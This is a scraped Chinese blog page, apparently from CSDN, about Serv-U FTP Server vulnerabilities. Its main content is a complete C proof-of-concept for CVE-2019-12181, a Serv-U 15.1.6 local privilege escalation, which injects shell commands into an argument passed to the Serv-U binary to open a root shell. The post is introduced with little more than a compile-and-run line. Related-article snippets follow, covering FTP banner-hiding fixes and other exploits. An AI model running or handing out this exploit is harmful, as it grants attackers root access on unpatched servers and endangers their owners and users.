cve-1999-0614 ftp服务器版本信息可被获取,最新CVE-2019-12181 Serv-U FTP Server < 15.1.7 - 本地提权漏洞...

最新推荐文章于 2023-12-25 12:00:00 发布
最新推荐文章于 2023-12-25 12:00:00 发布
阅读量527 收藏
点赞数
文章标签: cve-1999-0614 ftp服务器版本信息可被获取

不多说,直接上源码吧/*

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation

vulnerability found by:Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:gcc servu-pe-cve-2019-12181.c -o pe && ./pe

*/

#include 

#include 

#include 

int main(){

char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};

int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);

// if execv is successful, we won't reach here    printf("ret val: %d errno: %d\n", ret_val, errno);

return errno;

}

weixin_39900286
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
离线修复vsftp、OpenSSH漏洞
SongAn的博客
06-24 1367
vsftp vsftpd FTP Server ‘ls.c’ 远程拒绝服务漏洞(CVE-2011-0762) 修改文件/etc/vsftpd/vsftpd.conf 将匿名访问由NO改为YES(anonymous_enable=YES) 重启vsftp服务 service vsftpd restart FTP服务器版本信息可被获取(CVE-1999-0614)漏洞整改方法 修改文件/etc/vsftpd/vsftpd.conf 取消注释,修改banner内容 ftpd_banner=vsftp
FTP windows版本服务器 绿色版本
09-17
Xlight.ftp.server.Pro FTP服务器,支持启动多服务器,开发的左膀右臂,Windows版本,超级好用的工具。。。推荐推荐
FTP服务器版本信息可被获取(CVE-1999-0614)漏洞修复
G
04-17 864
FTP服务器版本信息可被获取(CVE-1999-0614)
cve-1999-0614 ftp服务器版本信息可被获取,关于SolarWinds Serv-U远程代码执行漏洞CVE-2021-35211)的预警提示...
weixin_28878117的博客
08-13 1307
一、漏洞详情Serv-U是Windows平台和Linux平台的安全FTP服务器(FTPS, SFTP, HTTPS),是一个文件管理、文件传输和文件共享的解决方案。2021年7月13日,SolarWinds对外发布漏洞公告,其产品Serv-U Managed File Transfer ServerServ-U Secured FTP在启用了SSH的情况下存在CVE-2021-35211远程代码...
Serv-U服务器漏洞,黑客可远程执行程序
w3cschools的博客
09-07 1430
近日,微软已经分享了有关影响 SolarWinds Serv-U 托管文件传输服务的现已修复、积极利用的关键安全漏洞的技术细节。 该漏洞源于 Serv-U 实施的 Secure Shell (SSH) 协议,攻击者可以利用该漏洞运行任意代码在受感染的系统上,包括安装恶意程序以及查看、更改或删除敏感数据的能力。 知名网络安全专家、东方联盟创始人郭盛华在描述该漏洞的详细文章中说:“Serv-U SSH 服务器存在一个预认证远程代码执行漏洞,可以在默认配置中轻松可靠地利用该漏洞。黑客攻击者可以通过连接到开
通过Kali利用serv-u漏洞获取win7系统管理员权限
weixin_60182338的博客
02-21 1671
渗透测试仅用于个人的学习以提升能力,不能用于非法的恶意攻击。
网络安全漏洞深度剖析
m0_59598029的博客
12-25 1653
2021年7月13日,美国微软威胁情报中心发布安全公告[1],文中指出黑客利用Serv-U 0day对极少数美国军工部门成功进行了攻击,同日Serv-U母公司solarwinds也发布安全公告[2],并针对最新大版本发布了补丁[3]。(注意:目前发布的补丁只针对最新的15.2.3大版本,且只能是付费用户才能下载安装补丁,非付费用户目前无法从官方渠道获取有效补丁。根据补丁比较和fuzzer,宁静之盾安全团队成功复现了该远程溢出漏洞,并能在实战环境下成功利用。
FTP服务器版本信息可被获取(CVE-1999-0614)(建议修改源代码或者配置文件改变缺省banner信息。)
讓之的博客
10-12 4146
漏洞扫描报告 1、测试查看,默认端口21 telnet 127.0.0.1 21 下图所示即为漏洞信息描述的 可获取版本号 2、修改 vsftpd.conf 配置文件(/etc/vsftpd/vsftpd.conf) 找到 ftpd_banner 位置,默认103行左右,修改为如下 You may fully customise the login banner string: ftpd_banner=this is vsftpd 如果没有安装vsftpd,先执行安装vsftpd #更新软
cve-1999-0614 ftp服务器版本信息可被获取,目标主机showmount -e信息泄露(CVE-1999-0554)...
weixin_31591833的博客
08-13 1177
记录一下扫描和测试中遇到的一个漏洞:目标主机showmount -e信息泄露先了解一下showmount命令:showmount命令用于查询NFS服务器(NFS 网络文件系统)# showmount --helpUsage: showmount [-adehv][--all] [--directories] [--exports][--no-headers] [--help] [--versio...
FTP服务器版本信息可被获取(CVE-1999-0614)漏洞整改方法
热门推荐
zcb_data的博客
06-06 1万+
vsftpd的banner中默认有当前版本号,可通过/etc/vsftpd/vsftpd.conf中的ftpd_banner项来自定义banner信息1,测试查看版本信息(端口默认21,可根据实际修改)[root@ip1]$ telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to localhost (127.0.0.1). Escape char...
服务器2008系统提权工具,CVE-2019-12181 Serv-U FTP Server 本地提权漏洞(Metasploit)利用工具...
weixin_39905226的博客
08-05 507
CVE-2019-12181 Serv-U FTP Server 本地提权漏洞(Metasploit)利用工具源码###ThismodulerequiresMetasploit:https://metasploit.com/download#Currentsource:https://github.com/rapid7/metasploit-framework##classMet...
Ftp Tree V1.5(可执行程序)- 获取FTP服务器目录树,支持恶劣网络条件
07-17
**** 已有更新版本,请下载新版本 **** 本程序可列出 FTP 服务器的全部目录结构,并将其树状结构以文本格式输出,具有以下特点: 1、使用单线程连接 FTP,适应恶劣网络条件,断线后可自动重连,可设置重试次数、手动跳过等; 2、支持与 cmd 的 tree 命令相同格式的目录树文本输出,可依据输出参数设置重复输出结果; 3、可指定需要列表的 FTP 根目录、递归目录深度、结果输出格式(是否包含文件、是否输出文件大小信息等); 4、可指定单个目录获取出错时的最大尝试次数,可手动跳过某个获取出错的目录; 5、可设置常见的 FTP 连接、传输参数,支持中文目录/文件名; 6、运行过程中可暂停/继续、中止,可随时输出当前已获取到的部分结果; 7、结果可保存到文件,载入后可重新输出结果,也可以继续上次未成功完成的部分; 8、支持隐藏为托盘区图标和气泡提示,任务完成后自动断开 FTP 连接; 9、基于 VS2008 C# 编写,使用 FtpWebRequest 实现,提供可执行程序及全部源代码。 若有其它问题,欢迎与我联系交流:[email protected],^_^ ============= 版本更新记录 ============= 说明: [+]增加功能特性 [-]较少功能特性 [!]改进已有功能 [X]修正已有Bug ---------------- - 1.5.9.0717 - ---------------- [+]错误达到指定次数后显示提示信息时,可指定是否暂停后续尝试。 [+]显示当前文件夹获取进度条。 [+]保持当前结果到文件,可重新载入,以便重新输出结果,也可以继续上次未成功完成的搜索任务。 [!]提高实时生效参数的灵敏性,若输入无效数字字符(如abc),会自动修改为默认值,不会导致程序异常。 [!]等待重连过程中,会有时间倒数提示,并且能即时中止任务。 [!]界面布局修改。 [!]修改提示信息文字。
CVE-2014-4113-exp.zip_CVE-2014-4113_cve_cve-2014-4113提权
09-24
CVE-2014-4113提权漏洞利用代码,国外大牛将最初只能在win7上使用的代码扩展到了win8上可用。python开发~
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-2019-11708诱骗父流程浏览到任意URL。 在过去的中,我已经介绍了CVE-2019-9810的根本原因和利用文章以及相关的。 CVE-2019-11708已由公告,并...
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
3796 i-FRAME 安装、操作和维护手册
04-27
3796 i-FRAME 安装、操作和维护手册
我的visio画图 资源备用
最新发布
04-27
我的visio画图
Windows怎么修复FTP服务器版本信息可被获取(CVE-1999-0614)
05-31
CVE-1999-0614是一个非常古老的漏洞,影响的是早期的FTP服务器软件,如Microsoft IIS 3.0和4.0。如果你正在使用这些版本的IIS,那么你需要升级到最新版本或者使用其他FTP服务器软件。如果你已经升级到了最新版本的IIS,但仍然存在这个问题,你可以考虑以下几种方法: 1. 禁用FTP服务版本信息 你可以通过修改IIS的配置文件来禁用FTP服务版本信息。具体来说,你需要在IIS的配置文件中添加以下代码: ``` <system.ftpServer> <security> <hideServerVersion enabled="true" /> </security> </system.ftpServer> ``` 这将禁用FTP服务器发送版本信息。 2. 使用安全FTP协议 你可以考虑使用安全FTP协议(如SFTPFTPS)来加密FTP数据传输。这样即使攻击者能够获取FTP服务器版本信息,也无法对数据进行拦截和篡改。 3. 配置防火墙 你可以通过配置防火墙来限制外部访问FTP服务。具体来说,你可以只允许特定IP地址或者IP地址段来访问FTP服务,这样可以减少攻击者的攻击面。 总之,如果你正在使用受影响的FTP服务器软件,你应该尽快升级到最新版本或者使用其他FTP服务器软件,并采取以上措施来保护FTP服务的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值